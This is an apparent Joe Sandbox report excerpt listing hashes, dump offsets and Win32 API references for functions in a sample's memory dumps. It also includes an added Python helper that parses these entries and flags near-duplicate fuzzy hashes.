                • Instruction Fuzzy Hash: 6D63AD70A902189FEB299F50CC56BAEBA76FF85700F5040E9E2093B3D1DA711E81DF65
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B67E
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: c71040ee1dcf71c90ea2691c355704aecbc10f99ec02083dbf717975975f91d0
                • Instruction ID: 36a70b5c7de9dbc002094cd83d1147670086a38fa119a741f52e8f2032830525
                • Opcode Fuzzy Hash: c71040ee1dcf71c90ea2691c355704aecbc10f99ec02083dbf717975975f91d0
                • Instruction Fuzzy Hash: 6C815570A00B458FDB24DF2AE45575ABBF1FF88304F00892ED49AEBA51D774E845CB91
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00E459C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 30df42f7a063cfa4fcc072789ecce4d0c2085877c235ad478884b61f9942b1f4
                • Instruction ID: 81fa8cf160442747df4c0c472b0806e666a7b4d2571d682b5d05dc6870e484ba
                • Opcode Fuzzy Hash: 30df42f7a063cfa4fcc072789ecce4d0c2085877c235ad478884b61f9942b1f4
                • Instruction Fuzzy Hash: ED41F2B1C00719CBDB24CFA9C844B9DBBF5BF48304F20806AD418BB255DB756946CF90
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00E459C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: abd19e2e6a2c6b8071a5089c4bca4884e14f506efebe8df0e6f047048c8c1f41
                • Instruction ID: bc2c71ba5b9d119109c8ade37c73d97256d73d88c3b6254698ac71ac018946aa
                • Opcode Fuzzy Hash: abd19e2e6a2c6b8071a5089c4bca4884e14f506efebe8df0e6f047048c8c1f41
                • Instruction Fuzzy Hash: B041F2B1C00719CBDB28CFA9C884B9DBBF1BF48304F20855AD408AB255DB755946CF51
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E4D98F
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 02de6d2919a7c7591773712cae72b1b6f3bdd23d00390010c517202a37a96548
                • Instruction ID: c361ef28c9510649f675716cc283264f2d901c6d686147226001fa15466a1800
                • Opcode Fuzzy Hash: 02de6d2919a7c7591773712cae72b1b6f3bdd23d00390010c517202a37a96548
                • Instruction Fuzzy Hash: 462105B59002499FDB10CF9AD884ADEFFF4FB49310F14805AE918A7350C379A980CFA5
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B67E
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 53f3ed20040f494ef3782a1bc83ad01fd65562de54454c21ad8dd0ea297cff8d
                • Instruction ID: 18ad26c2dfdd75441c8474558106d2d11d80021928519ffc10883975c97b3dd4
                • Opcode Fuzzy Hash: 53f3ed20040f494ef3782a1bc83ad01fd65562de54454c21ad8dd0ea297cff8d
                • Instruction Fuzzy Hash: A011DFB5C002498FDB10DF9AD444A9EFBF8EB88314F11846AD829B7210C379A545CFA5
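                The entries above that carry an API reference (GetModuleHandleW, CreateActCtxA, DuplicateHandle) are the ones worth pulling out of a function listing this long. The Python below is an added example, not part of the Joe Sandbox report: it parses entries in this page's layout into records, lists which Win32 APIs each memory-dump region references, and flags functions whose Instruction Fuzzy Hash is nearly identical (the two CreateActCtxA functions differ in only 12 of 70 hex digits). The position-wise digit comparison and the 0.8 threshold are assumptions of this example; the page does not document how Joe Sandbox compares these hashes. The sample text is constructed by copying four entries from this section.

```python
"""Triage helper for Joe Sandbox "Execution Graph" function entries.

Added example, not Joe Sandbox code.  Parses the per-function entries in the
layout used on this page (APIs / Memory Dump Source / Similarity) and clusters
functions whose Instruction Fuzzy Hash is nearly identical.  The similarity
metric (fraction of agreeing hex-digit positions) is an assumption made here.
"""
import re
from itertools import combinations

# Constructed sample: four entries copied from the report in the page's own layout.
SAMPLE_REPORT = """\
APIs
• CreateActCtxA.KERNEL32(?), ref: 00E459C9
Memory Dump Source
• Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
Similarity
• Opcode ID: 30df42f7a063cfa4fcc072789ecce4d0c2085877c235ad478884b61f9942b1f4
• Instruction Fuzzy Hash: ED41F2B1C00719CBDB24CFA9C844B9DBBF5BF48304F20806AD418BB255DB756946CF90
APIs
• CreateActCtxA.KERNEL32(?), ref: 00E459C9
Memory Dump Source
• Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
Similarity
• Opcode ID: abd19e2e6a2c6b8071a5089c4bca4884e14f506efebe8df0e6f047048c8c1f41
• Instruction Fuzzy Hash: B041F2B1C00719CBDB28CFA9C884B9DBBF1BF48304F20855AD408AB255DB755946CF51
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E4D98F
Memory Dump Source
• Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
Similarity
• Opcode ID: 02de6d2919a7c7591773712cae72b1b6f3bdd23d00390010c517202a37a96548
• Instruction Fuzzy Hash: 462105B59002499FDB10CF9AD884ADEFFF4FB49310F14805AE918A7350C379A980CFA5
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B67E
Memory Dump Source
• Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
Similarity
• Opcode ID: 53f3ed20040f494ef3782a1bc83ad01fd65562de54454c21ad8dd0ea297cff8d
• Instruction Fuzzy Hash: A011DFB5C002498FDB10DF9AD444A9EFBF8EB88314F11846AD829B7210C379A545CFA5
"""

# One API reference line: "• Name.MODULE(args), ref: ADDRESS"
API_RE = re.compile(r"^• (\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-F]+)$", re.M)
FIELD_RE = {
    "offset": re.compile(r"Offset: ([0-9A-F]+)"),
    "opcode_id": re.compile(r"Opcode ID: ([0-9a-f]{64})"),
    "fuzzy": re.compile(r"Instruction Fuzzy Hash: ([0-9A-F]+)"),
}


def parse_entries(text):
    """Split report text into per-function dicts.

    Every entry on the page ends with its Instruction Fuzzy Hash line, so that
    line is used as the record terminator.
    """
    entries, block = [], []
    for line in text.splitlines():
        block.append(line)
        if line.startswith("• Instruction Fuzzy Hash:"):
            chunk = "\n".join(block)
            entry = {}
            for name, rx in FIELD_RE.items():
                m = rx.search(chunk)
                entry[name] = m.group(1) if m else None
            entry["apis"] = [
                {"name": n, "module": mod, "args": a, "ref": r}
                for n, mod, a, r in API_RE.findall(chunk)
            ]
            entries.append(entry)
            block = []
    return entries


def fuzzy_similarity(h1, h2):
    """Fraction of hex-digit positions that agree (assumed metric, see docstring)."""
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(1 for a, b in zip(h1, h2) if a == b) / len(h1)


def near_duplicates(entries, threshold=0.8):
    """(opcode_id, opcode_id, similarity) for function pairs at or above threshold."""
    pairs = []
    for e1, e2 in combinations(entries, 2):
        s = fuzzy_similarity(e1["fuzzy"], e2["fuzzy"])
        if s >= threshold:
            pairs.append((e1["opcode_id"], e2["opcode_id"], round(s, 3)))
    return pairs


def apis_by_region(entries):
    """Map each memory-dump offset to the set of MODULE!Api names referenced there."""
    regions = {}
    for e in entries:
        for api in e["apis"]:
            regions.setdefault(e["offset"], set()).add(f"{api['module']}!{api['name']}")
    return regions


if __name__ == "__main__":
    found = parse_entries(SAMPLE_REPORT)
    print(f"{len(found)} functions parsed")
    for offset, apis in apis_by_region(found).items():
        print(offset, sorted(apis))
    for a, b, s in near_duplicates(found):
        print(f"near-duplicate {a[:12]}.. ~ {b[:12]}.. similarity={s}")
```

Near-duplicate pairs that also share the same API reference address, as the two CreateActCtxA functions do (ref 00E459C9), can be counted as one function when tallying what a dumped region is capable of; the region summary is then a compact list of the handle, module and activation-context calls made from the 00E40000 dump rather than the function-by-function listing above.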
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 4d6dd82a0586176787347e14ce94f61c157e767d44fc3982e4ef23266865b58b
                • Instruction ID: 1d1da7fad554fb6500f594ccfef7ef5978f63092ad51551ea8dd3fce71e3eda6
                • Opcode Fuzzy Hash: 4d6dd82a0586176787347e14ce94f61c157e767d44fc3982e4ef23266865b58b
                • Instruction Fuzzy Hash: 21A1A170A003459FCB19DF28D584A5EBBF6FF89300B248569D4599F362DB31ED45CBA0
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 1a219b7a21d818619a8110c7f86370e7650a038f838a6c869f138aaada0852c5
                • Instruction ID: b194f675b10c19931c01f2d41ce633c741287c3b47868f1cf5a542c30f446d5a
                • Opcode Fuzzy Hash: 1a219b7a21d818619a8110c7f86370e7650a038f838a6c869f138aaada0852c5
                • Instruction Fuzzy Hash: 2351BEB1A003069FC709DF6CD58499EBBF6FF88310B1586A9D4099B366DB30ED45CBA0
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: f2d5c8d4a6fbabb3958295e174071944e367118e5e4e61f4fc1d0b44c7b0579d
                • Instruction ID: 8d4e24b8bb70d0f7c192bb704bb85f4c6f73067c6447b3f264796c2cb9316b1a
                • Opcode Fuzzy Hash: f2d5c8d4a6fbabb3958295e174071944e367118e5e4e61f4fc1d0b44c7b0579d
                • Instruction Fuzzy Hash: 3751A0B1A003069FC709DF68C58495EBBF6FF89310B158AA9D4099B366DB30ED45CBA0
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: `]bq
                • API String ID: 0-248503667
                • Opcode ID: e5c2a4a84eca9c49732e747ce082e136371211062d0581664940145aa76ffaa8
                • Instruction ID: fc4a73cd21e4b87679f877a79f5abe1783d225badc9af267427018ea42a2eaa6
                • Opcode Fuzzy Hash: e5c2a4a84eca9c49732e747ce082e136371211062d0581664940145aa76ffaa8
                • Instruction Fuzzy Hash: E3418D327047158FCB14CF6DDA85A6ABBE5FF89311B1580AAD909DB362DA30DC41CB61
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 93b9d621bc29f0bd4304d9b132ce6a6fa5857c3a536b0805722dc671303b335e
                • Instruction ID: e0de853597ee3f49150cb75557383f6d63212796df27af856f49c08728624421
                • Opcode Fuzzy Hash: 93b9d621bc29f0bd4304d9b132ce6a6fa5857c3a536b0805722dc671303b335e
                • Instruction Fuzzy Hash: 38019E343057014FC7284FA898603667BA1FF84700F058C7DC85A8F752DA39F8029351
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8c063d07ad811dbbfb743185db827e30006b7e922d078fdba797fc6d96927a1
                • Instruction ID: c95689bdf9aa08518caea225ec533bc961ede7f25145d30f0c63c35602f379df
                • Opcode Fuzzy Hash: b8c063d07ad811dbbfb743185db827e30006b7e922d078fdba797fc6d96927a1
                • Instruction Fuzzy Hash: 25F116357106018FCB54DF6AC889A6EBBE6FF89310F198469E546CB372CB35E801DB51
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6fa8aedffdd133a6aecea426539a4eb746ef99c2b2c8d112dd9eb27c5f698d62
                • Instruction ID: 490027a97436177a23268178fc30335b0625f9290de38f4f585ace874c555150
                • Opcode Fuzzy Hash: 6fa8aedffdd133a6aecea426539a4eb746ef99c2b2c8d112dd9eb27c5f698d62
                • Instruction Fuzzy Hash: 91C12275E013409FCB258FACC9996AABFF2FBAD200F14846AD549D7351EA34CD41B790
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cae40e3ab2d3caa1e45d1374e60f45cdbc3add17999bb0b5562cf0da7c46b1f4
                • Instruction ID: e9a397aae7742bee55e591cd6a9d8a8a8506061266ac9d8f3f6cba4e7b251aa6
                • Opcode Fuzzy Hash: cae40e3ab2d3caa1e45d1374e60f45cdbc3add17999bb0b5562cf0da7c46b1f4
                • Instruction Fuzzy Hash: 79C11734A00259DFDB18CF98D884A9DFBB6FF88314F248169E805AB355CB71ED46DB90
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 450b6f9f4461500594eb96a60d75a98149bb6b2e2dffdc654e4d2863d623e58d
                • Instruction ID: 7effc237485870ff38032a5ee2df591f7dd77ecc452207e5e68d7dd2e76eec41
                • Opcode Fuzzy Hash: 450b6f9f4461500594eb96a60d75a98149bb6b2e2dffdc654e4d2863d623e58d
                • Instruction Fuzzy Hash: C7718C34A113059FCB15CFA8D988AAEBFB6FB8C210F14846AE50AD7355DB34DC42DB90
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5d1c8aed6b73ff7b36c18d114b67873cb903f08711d8b3d3f8e6533539ece7b
                • Instruction ID: fa1ea95f349703e850f75dbc9f84d0393c34b1ca4267f67f12735e7b3e35d9ab
                • Opcode Fuzzy Hash: f5d1c8aed6b73ff7b36c18d114b67873cb903f08711d8b3d3f8e6533539ece7b
                • Instruction Fuzzy Hash: 04614874A013059FCB19DFA8D844AAEBBF7FF88310F14842AE406A7355DB31AC42CB60
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e69fb87e50c392c0b1b4fa4bb6fdbb0911e33a18c6454aea9efdfe98a58ae18
                • Instruction ID: 31b8bd3f4314997e3057be381fadc0dc14d29eb34adde460026988626f523134
                • Opcode Fuzzy Hash: 2e69fb87e50c392c0b1b4fa4bb6fdbb0911e33a18c6454aea9efdfe98a58ae18
                • Instruction Fuzzy Hash: 9851B3767002099FCB11CFA8D8448FBBBBAEF88310B15846AF915D7212DB31D925DB90
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f97d893468337e76c50a2f6730ce5777d7820e766abd983eb90f990b4ee5cf92
                • Instruction ID: e943c3b63362cdafeafcbe3c46b8e0aaad20da226122aba334b89c40e2b257e9
                • Opcode Fuzzy Hash: f97d893468337e76c50a2f6730ce5777d7820e766abd983eb90f990b4ee5cf92
                • Instruction Fuzzy Hash: 14518E347003049FC719EB29D458A6ABBA7BFC9714F14846AE9068B3A6CF34ED42DB51
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7fc995c502c3860cf6e0d2a829bcca100049518719dd09a270aae32e90318085
                • Instruction ID: 5df6a5b0bcc68b6149de3561967f6c224fe745b625f63c6cb7dc531be4f58eaa
                • Opcode Fuzzy Hash: 7fc995c502c3860cf6e0d2a829bcca100049518719dd09a270aae32e90318085
                • Instruction Fuzzy Hash: 434122316053809FC712DB28E454EA6BBA2EF86715B19C4BED05D8F662C735EC82C761
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5f13d6d74393e53f1abbf8a3636b68ccee2190bc671d531da463a6e3d6edffa1
                • Instruction ID: 1092e26bb426a8e5afe1dc677b63a585d70e2fb294b63d5b64b5f474f24c1041
                • Opcode Fuzzy Hash: 5f13d6d74393e53f1abbf8a3636b68ccee2190bc671d531da463a6e3d6edffa1
                • Instruction Fuzzy Hash: 0D41D031B147058FCB15DF69D98496ABBA6FFC9310B15847AD849CB361DB30EC02C7A2
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f8d3ea401e04265ae52b267353a246cf4a2182bba26df68217d7dc0916078688
                • Instruction ID: b0e381ba06ec3b99e17f640e8a7691db06d9a41bb96ecf5fd7fd1365a5252d58
                • Opcode Fuzzy Hash: f8d3ea401e04265ae52b267353a246cf4a2182bba26df68217d7dc0916078688
                • Instruction Fuzzy Hash: 5641C534A01249DFDB09CFA8D584A9DFBF2FF88314F248559E805AB365C775AD82DB80
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d0b8acb12dc7fd742980900cbe54d0a21bfa7a57eb143c2311a44aa827a28b
                • Instruction ID: 480151483e40acf5efa8eefa0e7e2223a4e8e41e474a0ea7f2fa0faf7bc64114
                • Opcode Fuzzy Hash: a3d0b8acb12dc7fd742980900cbe54d0a21bfa7a57eb143c2311a44aa827a28b
                • Instruction Fuzzy Hash: 64214C713102108FC718DF3DD99896ABBEABF8D65471541A9E906CB371DE31DC41CB52
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45717f2b410a45672d590b356a665160e1044fa9d5a435eb44ed4bdca44e42b8
                • Instruction ID: bd62e2dcf3ca523e76e29a467010fe33cac61306c7da9381f2d40ac7983ffb34
                • Opcode Fuzzy Hash: 45717f2b410a45672d590b356a665160e1044fa9d5a435eb44ed4bdca44e42b8
                • Instruction Fuzzy Hash: C221A7327013109FD725AE29E444FAABBA7FFD5364F148476E9058B295CB31EC81D790
                Memory Dump Source
                • Source File: 0000000A.00000002.2177956052.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_ddd000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5fb2942ae751fc7ac96cfa4ea11f15a1d1c56ec140a735dde7878be2a1d6c56f
                • Instruction ID: fb65cbd4d7fd7b0ac14af2b99dfac7349f99b3892ef8fc770d275986b3a2722f
                • Opcode Fuzzy Hash: 5fb2942ae751fc7ac96cfa4ea11f15a1d1c56ec140a735dde7878be2a1d6c56f
                • Instruction Fuzzy Hash: A321FF71544240EFCF15DF24E980F26BF66FB98318F24C56AE9490A356C33AD816DBB2
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80b7e20b85713831c19f466ee24a36df0a5720ea983337ed8580ceb13a9212d7
                • Instruction ID: ed6b51d4d078d8751aea5b508b2f578bc5b763daa880f645a91de904270736b9
                • Opcode Fuzzy Hash: 80b7e20b85713831c19f466ee24a36df0a5720ea983337ed8580ceb13a9212d7
                • Instruction Fuzzy Hash: 9921A176A05715CFCB15CF68CA85A6ABBB0FF49301F1580A9D405DB366D730DC41DB62
                Memory Dump Source
                • Source File: 0000000A.00000002.2178070817.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_ded000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f6c4748e97cf6578fd1819e9f95ab634bd76651e9bab077b2f1f7c59dce57796
                • Instruction ID: 03fa2b8c6de2530235867bbc1286dbaa7118ed02333ffc24902e552c7518b2e3
                • Opcode Fuzzy Hash: f6c4748e97cf6578fd1819e9f95ab634bd76651e9bab077b2f1f7c59dce57796
                • Instruction Fuzzy Hash: D1213771504280EFCB05EF25C5C0F26BB66FB84314F24C56DDA494B296C73AD806CA71
                Memory Dump Source
                • Source File: 0000000A.00000002.2178070817.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_ded000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf1a06d6ff2575b9877152dd77c9848845c3cc2c2bd72ad70b7c3fc35181f956
                • Instruction ID: 4e3e237b401d42a4b1c2abc8df5956e4fe7661d98ad9a55adf36a57520aad4d7
                • Opcode Fuzzy Hash: bf1a06d6ff2575b9877152dd77c9848845c3cc2c2bd72ad70b7c3fc35181f956
                • Instruction Fuzzy Hash: 9921F571504284DFCB15EF24D584B16BF66FB84314F28C569D9494B296C73AD807CA71
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 84f8cf6b9550129795e8053fbb9c607a33e257f4f26d5c832a36479dbae91403
                • Instruction ID: 2510ddc38c13239bfe57298e5d4a27116809c4c0106604df0a95b2b188b0dbe8
                • Opcode Fuzzy Hash: 84f8cf6b9550129795e8053fbb9c607a33e257f4f26d5c832a36479dbae91403
                • Instruction Fuzzy Hash: 74214A756002109FCB0ADF58D4888AEBFB6FF8835570584A5F81597362CB34EE01CBA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eab2973add8beea65ccdc6bc45371866183e53870215d4251a401ef698d8ec7a
                • Instruction ID: 827e92890c296cf491b7ae08cbbfc736c60feffd4cacaa628fc437cdcc482593
                • Opcode Fuzzy Hash: eab2973add8beea65ccdc6bc45371866183e53870215d4251a401ef698d8ec7a
                • Instruction Fuzzy Hash: 021182327446204FD325DA6C9890A2BB7EAEBC8760B21457AE606DB354DE30DC0287A0
                Memory Dump Source
                • Source File: 0000000A.00000002.2178070817.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_ded000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15f4f4799890464db3f96a24f79ec2c0bc3e97f54d031513eef9b15b6855965e
                • Instruction ID: 0b2a60a44593ba019c5f6293393bd8f683e3ac592ddeea7c0581e484a4fdc54f
                • Opcode Fuzzy Hash: 15f4f4799890464db3f96a24f79ec2c0bc3e97f54d031513eef9b15b6855965e
                • Instruction Fuzzy Hash: BF215E755093C08FDB12DF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cc9c6c735e46b5193cdd28d2d8216e90c73faff60686a5c8d3c314d5d7a79845
                • Instruction ID: e9e77ee91c396d3aafd4ed83b3380e029ab023720c341f059252b244918e12fb
                • Opcode Fuzzy Hash: cc9c6c735e46b5193cdd28d2d8216e90c73faff60686a5c8d3c314d5d7a79845
                • Instruction Fuzzy Hash: D21101727013449FC319DF28D944A6EBBAAFF85320F14856ED0488B356CB30ED49C790
                Memory Dump Source
                • Source File: 0000000A.00000002.2177956052.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_ddd000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction ID: 664da5e62c01f30ce23f4243c9170023c15affa05f1b75516594e7b66b2e3902
                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction Fuzzy Hash: AA11E172404280CFCF12CF10D5C4B16BF72FB98314F28C6AAD8490B256C336D85ACBA2
                Memory Dump Source
                • Source File: 0000000A.00000002.2178070817.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
